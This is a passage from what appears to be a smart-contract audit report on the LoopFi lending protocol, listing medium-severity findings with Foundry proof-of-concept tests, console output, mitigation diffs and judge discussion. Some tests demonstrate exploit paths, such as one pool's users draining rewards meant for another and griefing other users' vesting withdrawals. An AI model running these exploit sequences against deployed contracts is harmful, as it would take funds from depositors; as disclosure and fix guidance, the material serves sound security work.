function liquidatePositionBadDebt(address owner, uint256 repayAmount) external whenNotPaused {
// validate params
if (owner == address(0) || repayAmount == 0) revert CDPVault__liquidatePosition_invalidParameters();
// load configs
VaultConfig memory config = vaultConfig;
LiquidationConfig memory liqConfig_ = liquidationConfig;
// load liquidated position
Position memory position = positions[owner];
DebtData memory debtData = _calcDebt(position);
uint256 spotPrice_ = spotPrice();
if (spotPrice_ == 0) revert CDPVault__liquidatePosition_invalidSpotPrice();
// verify that the position is indeed unsafe
if (_isCollateralized(calcTotalDebt(debtData), wmul(position.collateral, spotPrice_), config.liquidationRatio))
revert CDPVault__liquidatePosition_notUnsafe();
// load price and calculate discounted price
uint256 discountedPrice = wmul(spotPrice_, liqConfig_.liquidationDiscount);
// Ensure that the debt is greater than the collateral at discounted price
if (calcTotalDebt(debtData) <= wmul(position.collateral, discountedPrice)) revert CDPVault__noBadDebt();
// compute collateral to take, debt to repay
uint256 takeCollateral = wdiv(repayAmount, discountedPrice);
if (takeCollateral < position.collateral) revert CDPVault__repayAmountNotEnough();
// account for bad debt
takeCollateral = position.collateral;
repayAmount = wmul(takeCollateral, discountedPrice);
@>> uint256 loss = calcTotalDebt(debtData) - repayAmount;
// transfer the repay amount from the liquidator to the vault
poolUnderlying.safeTransferFrom(msg.sender, address(pool), repayAmount);
position.cumulativeQuotaInterest = 0;
position.cumulativeQuotaIndexLU = debtData.cumulativeQuotaIndexNow;
// update liquidated position
position = _modifyPosition(
pool.repayCreditAccount(debtData.debt, 0, loss); // U:[CM-11]
// transfer the collateral amount from the vault to the liquidator
token.safeTransfer(msg.sender, takeCollateral);
int256 quotaRevenueChange = _calcQuotaRevenueChange(-int(debtData.debt));
if (quotaRevenueChange != 0) {
IPoolV3(pool).updateQuotaRevenue(quotaRevenueChange); // U:[PQK-15]
In the liquidatePositionBadDebt
function, the calculation of the loss is done by subtracting the repaid portion of the debt from the total debt.
function calcTotalDebt(DebtData memory debtData) internal pure returns (uint256) {
@>> return debtData.debt + debtData.accruedInterest; //+ debtData.accruedFees;
Through the calcTotalDebt()
function, we know that the total debt includes both the principal debt and the interest accrued on the debt. In this CDPVault, the interest accrued on the debt is treated as profit. For example, in the liquidatePosition
function, profit is calculated as debtData
, and this profit is treated as interest revenue in other functions as well.
function liquidatePosition(address owner, uint256 repayAmount) external whenNotPaused {
//skip ........
uint256 newDebt;
uint256 profit;
uint256 maxRepayment = calcTotalDebt(debtData);
uint256 newCumulativeIndex;
if (deltaDebt == maxRepayment) {
newDebt = 0;
newCumulativeIndex = debtData.cumulativeIndexNow;
@>> profit = debtData.accruedInterest;
position.cumulativeQuotaInterest = 0;
//skip ........
Therefore, the loss should only account for the loss of the principal amount. In the liquidatePositionBadDebt
function, if repayAmount > debtData.debt
, there would actually be a small profit (repayAmount - debtData.debt
) instead of a loss. The calculation for the loss should be debtData.debt - repayAmount
to correctly reflect the loss of the principal portion.
Recommended Mitigation Steps
Modify the relevant formula for calculating the loss.
Assessed type
Koolex (judge) decreased severity to Medium and commented:
Looks valid. However, this is based on the assumption that loss of revenue is not a loss. Requesting from the Warden to provide further input to support this assumption. only in PJQA please.
crypticdefense (warden) commented:
@Koolex, I would like to provide further info as requested (my issue #394 is a duplicate).
The assumption that the
is not a loss is based off how the protocol itself will burn treasury shares to make up for the loss when there is bad debt. Think about it like this, theaccruedInterest
is the profit the protocol will receive from lending, and if there is bad debt accumulated, that means theaccruedInterest
has not been paid.Then, when someone liquidates the bad debt position, they can liquidate it for a discount. Since they are paying at a discount, the full debt cannot be repaid, so the protocol will proceed to cover the rest of the amount of debt by burning treasury shares. The
calculation is as follows:position debt + accruedInterest - repayAmount
, whererepayAmount
is the amount paid by the liquidator. However, the protocol never lostaccruedInterest
amount, that is just potential profit from lending that was never received.Even if there exists a case where some of the
was paid by the borrower, that is still profit that the protocol is burning. It should only burn the amount of shares equivalent to the debt owed, because that represents the loss. Profit accumulated is not a loss.So the protocol will proceed to burn
amount of treasury shares. It is burning extra treasury shares here because it includesaccruedInterest
, causing a range of issues such as DoS due to insufficient shares and incorrect accounting.
Thank you for the additional clarification. The issue stays as-is.
[M-19] Because of the asset: Share 1:1 Conversion
, if vault incurs a loss, the last user to withdraw will take the entire loss
Submitted by Infect3d, also found by zhaojohnson, Spearmint, lian886, pkqs90, and nnez
Because of the 1:1 conversion rate in PoolV3
, if the pool incur a loss due to liquidation from borrowed asset through CDPVault
, last user to withdraw will take the full loss.
Vulnerability details
Every user should be allowed to withdraw a fair share of what’s is available in the vault. But as:
- The exchange rate is always 1:1 for deposit and withdraw
- and losses can happen as the underlying can be borrowed,
There will be situations where the last user to withdraw will not be made whole.
Also, if the last user A is not whole, and another user B deposit to the vault, A can get its missing assets from B deposit and B will be at loss waiting for another deposit.
- Alice and Bob deposit 10 ETH each to PoolV3, PoolV3 has 20 ETH.
- Each user receive 10 shares, and there are 20 total shares.
- Eve deposit collateral to CDPVault and borrow 5 ETH.
- Eve get liquidated, the loss is 1 ETH .
- Treasury has 0 remaining assets to cover the debt (works also if less than 1 ETH treasury).
- PoolV3 has now 19 ETH, and Alice and Bob 10 shares each where the exchange rate is 1:1.
- Alice withdraw 10 ETH with her 10 shares.
- There’s only 9 ETH left for Bob.
File: src/PoolV3.sol
529: function repayCreditAccount(
530: uint256 repaidAmount,
531: uint256 profit,
532: uint256 loss
533: )
...: // ------- some code ------- //
548: if (profit > 0) {
549: _mint(treasury, convertToShares(profit));
550: } else if (loss > 0) { <@(1) //we're in this case when there's a loss
551: address treasury_ = treasury;
552: uint256 sharesInTreasury = balanceOf(treasury_);
553: uint256 sharesToBurn = convertToShares(loss);
554:❌ if (sharesToBurn > sharesInTreasury) { <@(2) //sharesToBurn are capped to sharesInTreasury
555: unchecked {
556: emit IncurUncoveredLoss({
557: creditManager: msg.sender,
558: loss: convertToAssets(sharesToBurn - sharesInTreasury)
559: });
560: }
561:❌ sharesToBurn = sharesInTreasury; <@(2)
562: }
563:❌ _burn(treasury_, sharesToBurn);
564: }
Loss of funds for users. Unfair loss distribution among users, as the only last withdrawer will incur the entire loss of the vault
Proof of Concept
Add this test to src/test/unit/CDPVault.t.sol
function testAudit_PoolV3LastWithdrawerAtLossWhenBadDebt() public {
CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 1 ether, 1 ether);
// removing the initial deposit made in setUp() so that PooLV3 is empt
liquidityPool.withdraw(1_000_000 ether, address(this), address(this));
address alice = makeAddr("alice");
address bob = makeAddr("bob");
address position = address(this);
address poolUnderlying = liquidityPool.underlyingToken();
// Alice deposits 50 ETH
deal(poolUnderlying, alice, 50 ether);
IERC20(underlyingToken).approve(address(liquidityPool), 50 ether);
liquidityPool.deposit(50 ether, alice);
// Bob deposits 50 ETH
deal(poolUnderlying, bob, 50 ether);
IERC20(underlyingToken).approve(address(liquidityPool), 50 ether);
liquidityPool.deposit(50 ether, bob);
// state after liquidation
console.log("---------- initial state with borrowed assets ----------");
console.log("PoolV3 shares balance: %e", liquidityPool.totalSupply());
console.log("PoolV3 ETH balance: %e", IERC20(poolUnderlying).balanceOf(address(liquidityPool)));
// Simulating a user depositing 100 collateral and borrowing 80 ETH through CDPVault
_modifyCollateralAndDebt(vault, 100 ether, 80 ether);
uint256 virtualDebtBefore = virtualDebt(vault, position);
console.log("virtualDebt before: %e", virtualDebtBefore);
vm.warp(block.timestamp + 365 days);
uint256 virtualDebtAfter = virtualDebt(vault, position);
console.log("virtualDebt after (accrued interest): %e", virtualDebtAfter);
// Simulating liquidation of the position and bad debt
uint256 repayAmount = 80 ether;
_updateSpot(0.7 ether);
mockWETH.approve(address(vault), repayAmount);
vault.liquidatePositionBadDebt(position, repayAmount);
// state after liquidation
console.log("---------- state after bad debt liquidation ----------");
console.log("PoolV3 shares balance: %e", liquidityPool.totalSupply());
console.log("PoolV3 ETH balance: %e", IERC20(poolUnderlying).balanceOf(address(liquidityPool)));
console.log("... Still 100 shares in PoolV3, but only 90 ETH left for Alice and Bob ...");
liquidityPool.withdraw(50 ether, alice, alice);
console.log("---------- state after Alice withdraw ----------");
console.log("PoolV3 shares balance: %e", liquidityPool.totalSupply());
console.log("PoolV3 ETH balance: %e", IERC20(poolUnderlying).balanceOf(address(liquidityPool)));
console.log("... Bob has 50 shares but can only withdraw 40 ETH ...");
vm.expectRevert("SafeCast: value must be positive");
liquidityPool.withdraw(50 ether, bob, bob);
Ran 1 test for src/test/unit/CDPVault.t.sol:CDPVaultTest
[PASS] testAudit_collateralDebt() (gas: 3980542)
---------- initial state with borrowed assets ----------
PoolV3 shares balance: 1e20
PoolV3 ETH balance: 1e20
virtualDebt before: 8e19
virtualDebt after (accrued interest): 1.03138823529411764705e20
---------- state after bad debt liquidation ----------
PoolV3 shares balance: 1e20
PoolV3 ETH balance: 9e19
... Still 100 shares in PoolV3, but only 90 ETH left for Alice and Bob ...
---------- state after Alice withdraw ----------
PoolV3 shares balance: 5e19
PoolV3 ETH balance: 4e19
... Bob has 50 shares but can only withdraw 40 ETH ...
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.32ms (2.27ms CPU time)
Recommended Mitigation Steps
When there are more shares than assets and vault cannot make all users whole. Withdrawals should be lossy to split loss over all users.
This could be something like this:
/// @dev Internal conversion function (from assets to shares) with support for rounding direction
/// @dev Pool is not vulnerable to the inflation attack, so the simplified implementation w/o virtual shares is used
function _convertToShares(uint256 assets, Math.Rounding rounding) internal returns (uint256 shares) {
uint256 supply = totalSupply();
if (supply < totalAssets()) {
shares = (assets == 0 || supply == 0) ? assets : assets.mulDiv(supply, totalAssets(), rounding);
else {
shares = assets;
return shares;
/// @dev Internal conversion function (from shares to assets) with support for rounding direction
/// @dev Pool is not vulnerable to the inflation attack, so the simplified implementation w/o virtual shares is used
function _convertToAssets(uint256 shares, Math.Rounding rounding) internal returns (uint256 assets) {
uint256 supply = totalSupply();
if (supply < totalAssets()) {
assets = (supply == 0) ? shares : shares.mulDiv(totalAssets(), supply, rounding);
else {
assets = shares;
return assets;
Assessed type
Koolex (judge) decreased severity to Medium
[M-20] Honest users could be permanently DOS’d from withdrawing their vested tokens/rewards
Submitted by Bauchibred
Proof of Concept
is a public function and callable by anyone. When claiming, there is a need to vest the tokens, now this vesting directly vests to the multifeedistributor
In MultiFeeDistribution#vestTokens()
, there is a logic to only allow pushing a new entry for a user to his _userEarnings
array once in a day. These rewards are then kept, and then after the vesting period a user can claim their rewards, where the _userEarnings
array would be looped through.
Now from the links to the necessary functions attached, we can see that there is no minimum claimants to be made, asides the check that RDNT
must be >
, however as little as 1
is allowed.
For active users that could earn even if little rewards per day, this then allows a malicious user to cause a permanent DOS to claiming their vested tokens, since all the attacker has to do, is once a day for as long as the vesting duration query, which could in valid scenarios be quite lengthy query ChefIncentivesController#Claim()
while passing the user’s address. Then, when the user comes to withdraw their vested tokens, the loop OOG’s and then reverts due to the amount of entries in the _userEarnings
array .
Potential permanent DOS to honest users (or force the users to incur losses since some tech savvy users can notice this griefing attempt, but to stop this they’d have to withdraw early which forces them to incur losses, since even if the vesting duration reduces there is no other method for the user to withdraw their tokens and it’s stuck in the protocol. Alternatively, if the user leaves the claiming of their tokens even after the vesting period and does not immediately withdraw; the chances of this happening heavily increases since with each day an entry to the _userEarnings
array can be made.
Recommended Mitigation Steps
Consider introducing some access control to ChefIncentivesController#Claim()
and only allow the users call this for themselves.
Assessed type
amarcu (LoopFi) confirmed and commented:
This is a grieve attack on rewards, the user funds are not at risk.
Koolex (judge) decreased severity to Medium
@Koolex - I respectfully believe that this is invalid, as vesting tokens is only doable by minters, here, that are assigned by the contract owner, i.e., trusted. Moreover, a user is allowed to call
on a certain number of reward tokens, so even if DOS exists (it doesn’t but assuming minters are malicious) a user can still claim their rewards.
Bauchibred (warden) commented:
I do not understand the sponsors claim above to downgrade the severity of this report. Afaik, in the scope of this audit rewards are to be considered as users funds. This attack case has a simple path, a malicious user griefs users from their rewards by constantly calling
so they are forced to incur losses.This directly puts their assets at risk as they can’t access it as expected and why I submitted as High. Since the viable option for the users, which in my opinion, still points this to high is for them to withdraw early and incur losses.
Also I think @0xAlix2 seems to see the bug case as been backed by a malicious minter; however, their claim actually shows how vesting the tokens every day would be what a non-malicious minter would do; since if users are active and earn rewards for that day then there should be no reason why their tokens are not vested for the day which is what he’s suggesting. If that’s done, then this just breaks the logic as users are not being given their rewards, no?
Thank you everyone for your input. Given the input above, I believe this is valid and stays as-is.
[M-21] In PositionActionPendle::_onDecreaseLever
, tokenOut
is implemented incorrectly
Submitted by minglei-wang-3570, also found by zhaojohnson, lian886, and 0xc0ffEE
The function PositionActionPendle::_onDecreaseLever
is a hook to decrease lever by withdrawing collateral from the CDPVault. But the current implementation is wrong if leverParams.auxAction.args.length
is 0, _onWithdraw
is called here, but the tokenOut
still returns 0.
function _onDecreaseLever(
LeverParams memory leverParams,
uint256 subCollateral
) internal override returns (uint256 tokenOut) {
@> _onWithdraw(leverParams.vault, leverParams.position, address(0), subCollateral);
if (leverParams.auxAction.args.length != 0) {
bytes memory exitData = _delegateCall(
address(poolAction), abi.encodeWithSelector(poolAction.exit.selector, leverParams.auxAction)
@> tokenOut = abi.decode(exitData, (uint256));
The tokenOut
accounting will be incorrect if the leverParams.auxAction.args.length
is 0.
Proof of Concept
We can see that the function PositionActionPendle::_onDecreaseLever
returns the tokenOut
on successful withdraw.
function _onDecreaseLever(
LeverParams memory leverParams,
uint256 subCollateral
) internal override returns (uint256 tokenOut) {
_onWithdraw(leverParams.vault, leverParams.position, address(0), subCollateral);
if (leverParams.auxAction.args.length != 0) {
bytes memory exitData = _delegateCall(
address(poolAction), abi.encodeWithSelector(poolAction.exit.selector, leverParams.auxAction)
tokenOut = abi.decode(exitData, (uint256));
But in the above implementation, The tokenOut
accounting will be incorrect if the leverParams.auxAction.args.length
is 0.
The implementation properly handled in the function PositionAction4626::_onDecreaseLever()
as the tokenOut
is return even if leverParams.auxAction.args.length
is 0.
function _onDecreaseLever(
LeverParams memory leverParams,
uint256 subCollateral
) internal override returns (uint256 tokenOut) {
// withdraw collateral from vault
uint256 withdrawnCollateral = ICDPVault(leverParams.vault).withdraw(address(this), subCollateral);
// withdraw collateral from the ERC4626 vault and return underlying assets
@> tokenOut = IERC4626(leverParams.collateralToken).redeem(withdrawnCollateral, address(this), address(this));
if (leverParams.auxAction.args.length != 0) {
bytes memory exitData = _delegateCall(
abi.encodeWithSelector(poolAction.exit.selector, leverParams.auxAction)
tokenOut = abi.decode(exitData, (uint256));
Recommended Mitigation Steps
Handle the edge case properly like PositionAction4626::_onDecreaseLever()
and return tokenOut
if leverParams.auxAction.args.length
is 0.
Assessed type
amarcu (LoopFi) confirmed and commented:
The flow will always revert because of how the parameters are set. We will make the update to always revert with a custom message for the case where the
is not defined. Maybe this can be re-evaluated as a medium.
Koolex (judge) decreased severity to Medium and commented:
Medium, since it is an edge case.
[M-22] Users of a vault can steal other user’s rewards when one vault’s lastRewardTime
differs from another vault’s lastRewardTime
Submitted by rscodes, also found by 0xpiken, hash, and novamanbg (1, 2)
In ChefIncentivesController.sol
, the _newRewards
function calculates the new rewards accumulated since the last update of that specific pool Line 988-994:
function _newRewards(
VaultInfo memory pool,
uint256 _totalAllocPoint
) internal view returns (uint256 newReward, uint256 newAccRewardPerShare) {
if (lpSupply > 0) {
-> uint256 duration = block.timestamp - pool.lastRewardTime;
-> uint256 rawReward = duration * rewardsPerSecond;
-> uint256 rewards = availableRewards();
-> if (rewards < rawReward) {
-> rawReward = rewards;
-> }
For example, when a user changes his debt in CDPVault, handleActionAfter
is called by the vault, which only changes the pool.lastRewardTime
of that individual pool representing that vault through _updatePool
This is problematic as it means different pools can have different pool.lastRewardTime
, which means the way that rewards are calculated in _newRewards
will cause one pool to receive more rewards than it is supposed to, at the loss of another pool.
A summary would be that availableRewards()
returns depositedRewards - accountedRewards;
and pool.lastRewardTime
being different means that one pool has been adding to accountedRewards
and its struct variables ahead of another pool. That one pool should then have a “lesser” share in the value returned by availableRewards()
; however, the current code does not take that into account, allowing that pool to dig into rewards meant for other pools who has a more outdated pool.lastRewardTime
Consider this symbol diagram example:
[-----A-----|-----B-----] (pool 1)
[-----------C-----------] (pool 2)
Day: 0 x y z
Suppose there are 2 pools (represented by the first and second []
block respectively) that are eligible for rewards. And day y
is the value endRewardTime()
returns. And day z
is a value larger than day y
. Part A
represents the rewards that are to be claimed by pool 1 during the time period [0,x)
, Part B
represents [x,y)
for pool 1 as well, while Part C
represents the full rewards that are to be claimed by pool 2 during [0,y)
. Below I will explain the sequence which allows pool 1 to steal 1/4
of part C
from pool 2.
- Both pools start accumulating rewards from
day 0
. - At
day x
, user in pool 1 changes his debt (by any amount). This will trigger_modifyPosition
(in CDPVault.sol) which will callhandleActionAfter
(in ChefIncentiveController.sol). handleActionAfter
in ChefIncentiveController.sol will call_updatePool
for pool 1 only, adding part A (refer to symbol diagram) intoaccountedRewards
. (Through this lineaccountedRewards = accountedRewards + reward;
).- Now suppose on
day z
(which is greater thanday y
), the user in pool 1 tries toclaim
will then call_updatePool
which will then call_newRewards
. -
Now lets go through what happens inside
gets set toz - pool.lastRewardTime
=z - x
gets set toduration * rewardsPerSecond
returnsdepositedRewards - accountedRewards
; hence,availableRewards()
= partB+C
is already inaccountedRewards
).- Since
z > y
will be<
for some values ofz
, this results in the function settingrawReward = availableRewards();
inside the if statement. - So now,
= partB+C
. - Hence, the value returned by
for pool 1 will include partC
which is supposed to be pool 2’s rewards; effectively allowing user from pool 1 to steal a fraction of another user’s rewards from pool 2. (In this scenario, pool 1 can steal1/4
of partC
Proof of Code
The below code is the coded version of the explanation above:
function test_durationHack() public {
rewardsPerSecond = 1 ether; //changed to make console output more understandable
endingTimeCadence = 30 seconds;
incentivesController.setRewardsPerSecond(rewardsPerSecond, true);
address Alice = address(0x123);
address Bob = address(0x567);
address vault1 = address(0x1);
uint256 totalAllocPoint = 1000;
incentivesController.addPool(vault1, totalAllocPoint / 2); //give both pools equal allocation for convenience
address vault2 = address(0x2);
incentivesController.addPool(vault2, totalAllocPoint / 2); //give both pools equal allocation for convenience
loopToken.mint(address(incentivesController), 120 ether);
incentivesController.registerRewardDeposit(120 ether); //give out 120 ether as incentive
abi.encodeWithSelector(IEligibilityDataProvider.lastEligibleStatus.selector, Alice),
abi.encodeWithSelector(EligibilityDataProvider.refresh.selector, Alice),
vm.prank(vault1); //set msg.sender to vault1
incentivesController.handleActionAfter(Alice, 1 ether, 1 ether); //simulates Alice taking on a debt of 1 ether at vault1
abi.encodeWithSelector(IEligibilityDataProvider.lastEligibleStatus.selector, Bob),
abi.encodeWithSelector(EligibilityDataProvider.refresh.selector, Bob),
vm.prank(vault2); //set msg.sender to vault2
incentivesController.handleActionAfter(Bob, 1 ether, 1 ether); //simulates Bob taking on a debt of 1 ether at vault2
// based on the above scenario, each Alice and Bob are supposed to get 60 ether each at the end.
skip(1 minutes); // go to the 1 minute mark (day x in the symbol diagram)
abi.encodeWithSelector(IEligibilityDataProvider.lastEligibleStatus.selector, Alice),
abi.encodeWithSelector(EligibilityDataProvider.refresh.selector, Alice),
vm.prank(vault1); //set msg.sender to vault1
incentivesController.handleActionAfter(Alice, 1 ether - 1 wei, 1 ether - 1 wei); //simulates Alice changing debt by any insignificant amount in vault1, resulting in _updatePool being called for vault1
skip(1 minutes); //further skip 1 minute, reaching the **2 minute mark** (day y in the symbol diagram)
console.log("Alice rewards at 2 minutes:", incentivesController.allPendingRewards(Alice)); // 2 minutes is the time at which 60 ether should be given to each of Alice and Bob, and no one is supposed to get more afterwards if not for the bug
skip(1 minutes); // (day z in the symbol diagram)
console.log("Alice rewards at 3 minutes:", incentivesController.allPendingRewards(Alice)); // as you can see Alice continues to receive rewards even after she isnt supposed to, exploiting the difference in pool.lastRewardTime to do so
console.log("Bob's reward at the end: ", incentivesController.allPendingRewards(Bob));
Console Output:
Ran 1 test for src/test/unit/ChefIncentivesController.t.sol:ChefIncentivesControllerTest
[PASS] test_durationHack() (gas: 688851)
Alice rewards at 2 minutes: 59999999999999999970
Alice rewards at 3 minutes: 74999999999999999955
Bob's reward at the end: 45000000000000000000
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.68ms (1.13ms CPU time)
Ran 1 test suite in 301.12ms (5.68ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Notable comments:
- The first
is where we simulate Alice taking on 1 ether debt inside vault1. - The second
is where we simulate Bob taking on 1 ether debt inside vault2. - The last
is where we simulate Alice changing her debt by an insignificant amount in vault1, resulting in_updatePool
being called for only vault1. - Since we mint
120 ether
as rewards and we setrewardsPerSecond = 1 ether
, and both Alice and Bob start staking the same amounts at the same time in different pools of equal point allocation weightage, at the end of2 minutes
, both Alice and Bob should have received equal amounts of reward (60 ether
each). - However, we can see in the console output that Alice continues to gain tokens past
2 minutes
and at the end has74999999999999999955 tokens
~=75 ether
, while Bob only has45 ether
. - Alice has successfully taken advantage of the difference in pool’s
bug, to steal15 ether
of rewards from Bob, resulting in a permanent loss of rewards for Bob. (the15 ether
here is basically the1/4
of partC
in the symbol diagram explanation).
Recommended Mitigation Steps
struct VaultInfo {
uint256 totalSupply;
uint256 allocPoint; // How many allocation points assigned to this vault.
uint256 lastRewardTime; // Last second that reward distribution occurs.
uint256 accRewardPerShare; // Accumulated rewards per share, times ACC_REWARD_PRECISION. See below.
+ uint256 accountedRewards;
function _updatePool(VaultInfo storage pool, uint256 _totalAllocPoint) internal {
uint256 timestamp = block.timestamp;
uint256 endReward = endRewardTime();
if (endReward <= timestamp) {
timestamp = endReward;
if (timestamp <= pool.lastRewardTime) {
(uint256 reward, uint256 newAccRewardPerShare) = _newRewards(pool, _totalAllocPoint);
accountedRewards = accountedRewards + reward;
+ pool.accountedRewards = pool.accountedRewards + reward;
pool.accRewardPerShare = pool.accRewardPerShare + newAccRewardPerShare;
pool.lastRewardTime = timestamp;
function _newRewards(
VaultInfo memory pool,
uint256 _totalAllocPoint
) internal view returns (uint256 newReward, uint256 newAccRewardPerShare) {
uint256 lpSupply = pool.totalSupply;
if (lpSupply > 0) {
uint256 duration = block.timestamp - pool.lastRewardTime;
uint256 rawReward = duration * rewardsPerSecond;
- uint256 rewards = availableRewards();
+ uint256 rewards = (depositedRewards * pool.allocPoint / _totalAllocPoint) - pool.accountedRewards;
if (rewards < rawReward) {
rawReward = rewards;
- newReward = (rawReward * pool.allocPoint) / _totalAllocPoint;
+ newReward = rawReward;
newAccRewardPerShare = (newReward * ACC_REWARD_PRECISION) / lpSupply;
After those changes, console output is now showing that rewards are distributed accurately (60 ether
Ran 1 test for src/test/unit/ChefIncentivesController.t.sol:ChefIncentivesControllerTest
[PASS] test_durationHack() (gas: 713083)
Alice rewards at 2 minutes: 60000000000000000000
Alice rewards at 3 minutes: 60000000000000000000
Bob's reward at the end: 60000000000000000000
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 34.47ms (4.83ms CPU time)
Ran 1 test suite in 348.00ms (34.47ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Tools Used
Foundry, VSCode
Assessed type
amarcu (LoopFi) confirmed and commented:
This is a grieve attack on rewards and not user funds. Maybe it should be a medium.
Koolex (judge) decreased severity to Medium
[M-23] The debt in EligibilityDataProvider::requiredUsdValue()
needs to be converted into USD; otherwise, it is not a correct value comparison
Submitted by lian886, also found by pkqs90 and nnez
It does not align with the documentation and the eligibility criteria for rewards are lower than what is specified by the protocol.
Proof of Concept
function requiredUsdValue(address user) public view returns (uint256 required) {
@>> uint256 totalNormalDebt = vaultRegistry.getUserTotalDebt(user);
@>> required = (totalNormalDebt * requiredDepositRatio) / RATIO_DIVISOR;
return _lockedUsdValue(required);
Here, the value of totalNormalDebt
should be calculated first, and then the requiredDepositRatio
should be applied to that value.
However, in the current implementation:
function isEligibleForRewards(address _user) public view returns (bool) {
uint256 lockedValue = lockedUsdValue(_user);
uint256 requiredValue = (requiredUsdValue(_user) * priceToleranceRatio) / RATIO_DIVISOR;
return requiredValue != 0 && lockedValue >= requiredValue;
function lockedUsdValue(address user) public view returns (uint256) {
Balances memory _balances = IMultiFeeDistribution(multiFeeDistribution).getBalances(user);
return _lockedUsdValue(_balances.locked);
function _lockedUsdValue(uint256 lockedLP) internal view returns (uint256) {
uint256 lpPrice = priceProvider.getLpTokenPriceUsd();
return (lockedLP * lpPrice) / 10 ** 18;
Based on the lockedUsdValue
function and the _lockedUsdValue()
function, we know that:
lockedValue = _lockedUsdValue(_balances.locked) = (_balances.locked * lpPrice) / 10**18;
uint256 requiredValue = (requiredUsdValue(_user) * priceToleranceRatio) / RATIO_DIVISOR;
This expands to:
requiredValue = _lockedUsdValue((totalNormalDebt * requiredDepositRatio) / RATIO_DIVISOR) * priceToleranceRatio / RATIO_DIVISOR;
Which further breaks down to:
requiredValue = (((totalNormalDebt * requiredDepositRatio) / RATIO_DIVISOR) * lpPrice / 10**18) * (priceToleranceRatio / RATIO_DIVISOR);
This shows the step-by-step calculation of the lockedValue
and requiredValue
based on the total debt, deposit ratio, and price tolerances.
Thus, the comparison lockedValue >= requiredValue
lockedLP > totalNormalDebt * (requiredDepositRatio / RATIO_DIVISOR) * (priceToleranceRatio / RATIO_DIVISOR)
requiredDepositRatio / RATIO_DIVISOR
= 5%priceToleranceRatio / RATIO_DIVISOR
= 90%
This simplifies to:
lockedLP > totalNormalDebt * 5% * 90% = 4.5% * totalNormalDebt
So, the condition checks if the lockedLP
is greater than 4.5% of the totalNormalDebt
This contradicts the description in the documentation:
“Loopers maintaining a dLP value exceeding 5% of their Total Position Size qualify for LOOP token emissions to offset borrowing costs incurred from leveraging.”
In reality, because the value of one lockedLP
token is lower than the value of the debt (in ETH), the number of lockedLP
tokens falls far short of the actual requirement.
Recommended Mitigation Steps
In the requiredUsdValue
function, the debt value is first calculated and then multiplied by the relevant ratio. In fact, Radiant Capital implements this exact approach in their code, as shown here.
Assessed type
[M-24] lastRPS
could be set to 0
Submitted by 0xpiken, also found by zzebra83 and rscodes
New reward distribution can not start automatically when lastRPS
is set to 0
Proof of Concept
When ChefIncentivesController#claim()
is called to vest reward for eligible user, _updateEmissions()
is invoked first. This function checks if the current reward distribution has ended and, if so, stores the value of rewardsPerSecond
into lastRPS
for future use:
function _updateEmissions() internal {
if (block.timestamp > endRewardTime()) {
@> lastRPS = rewardsPerSecond;
@> rewardsPerSecond = 0;
When new rewards are deposited, the cached value in lastRPS
should be restored to rewardsPerSecond
to restart the reward distribution.
function registerRewardDeposit(uint256 _amount) external onlyOwner {
depositedRewards = depositedRewards + _amount;
if (rewardsPerSecond == 0 && lastRPS > 0) {
@> rewardsPerSecond = lastRPS;
emit RewardDeposit(_amount);
However, if somehow claim()
is called twice continually when the current reward distribution ends, lastRPS
will be set to 0
and registerRewardDeposit()
can not restart new reward distribution.
Copy below codes to ChefIncentivesController.t.sol and run forge test --match-test test_setLastRPStoZero
function test_setLastRPStoZero() public {
address alice = makeAddr("alice");
address bob = makeAddr("bob");
uint rps = incentivesController.rewardsPerSecond();
incentivesController.addPool(address(0x1), 1000);
incentivesController.addPool(address(0x2), 1000);
incentivesController.setRewardsPerSecond(rps, true);
loopToken.mint(address(incentivesController), 1000 ether);
uint256 rewardAmount = 1000 ether;
vm.warp(block.timestamp + 30 days);
address[] memory vaults = new address[](2);
vaults[0] = address(0x1);
vaults[1] = address(0x2);
abi.encodeWithSelector(EligibilityDataProvider.isEligibleForRewards.selector, alice),
abi.encodeWithSelector(EligibilityDataProvider.refresh.selector, alice),
abi.encodeWithSelector(EligibilityDataProvider.getDqTime.selector, alice),
abi.encodeWithSelector(EligibilityDataProvider.isEligibleForRewards.selector, bob),
abi.encodeWithSelector(EligibilityDataProvider.refresh.selector, bob),
abi.encodeWithSelector(EligibilityDataProvider.getDqTime.selector, bob),
abi.encodeWithSelector(IEligibilityDataProvider.lastEligibleStatus.selector, alice),
abi.encodeWithSelector(IEligibilityDataProvider.lastEligibleStatus.selector, bob),
incentivesController.handleActionAfter(alice, 500 ether, 1000 ether);
incentivesController.handleActionAfter(bob, 500 ether, 1000 ether);
vm.warp(block.timestamp + 30 days);
abi.encodeWithSelector(IMultiFeeDistribution.vestTokens.selector, alice, 1000 ether),
abi.encodeWithSelector(IMultiFeeDistribution.vestTokens.selector, bob, 1000 ether),
//@audit-info rewardsPerSecond is 1e16 before claim for alice
assertEq(incentivesController.lastRPS(), 0);
assertEq(incentivesController.rewardsPerSecond(), 10000000000000000);
incentivesController.claim(alice, vaults);
//@audit-info rewardsPerSecond is set to 0, and its previous value is stored in lastRPS for future use
assertEq(incentivesController.lastRPS(), 10000000000000000);
assertEq(incentivesController.rewardsPerSecond(), 0);
incentivesController.claim(bob, vaults);
//@audit-info however, lastRPS is updated to 0 when claim() is called again for bob.
assertEq(incentivesController.lastRPS(), 0);
assertEq(incentivesController.rewardsPerSecond(), 0);
//@audit-info new reward deposit can not restart distribution
loopToken.mint(address(incentivesController), 1000 ether);
incentivesController.registerRewardDeposit(1000 ether);
assertEq(incentivesController.rewardsPerSecond(), 0);
Recommended Mitigation Steps
should not be updated when rewardsPerSecond
is 0
function _updateEmissions() internal {
if (block.timestamp > endRewardTime()) {
- lastRPS = rewardsPerSecond;
+ if (rewardsPerSecond != 0) {
+ lastRPS = rewardsPerSecond;
+ }
rewardsPerSecond = 0;
Assessed type
Invalid Validation
@Koolex - The report shows a valid scenario where
could end up being 0; however, this is intended, if therewardsPerSecond
is set to 0 then so doeslastRPS
, as it representslast RPS, used during refill after reserve empty
.Moreover, the report claims that new rewards can’t be registered by calling
, because of the 0 value oflastRPS
. However, the owner could simply callsetRewardsPerSecond
to reset it, and everything will continue to work as expected. Hence, this is invalid.
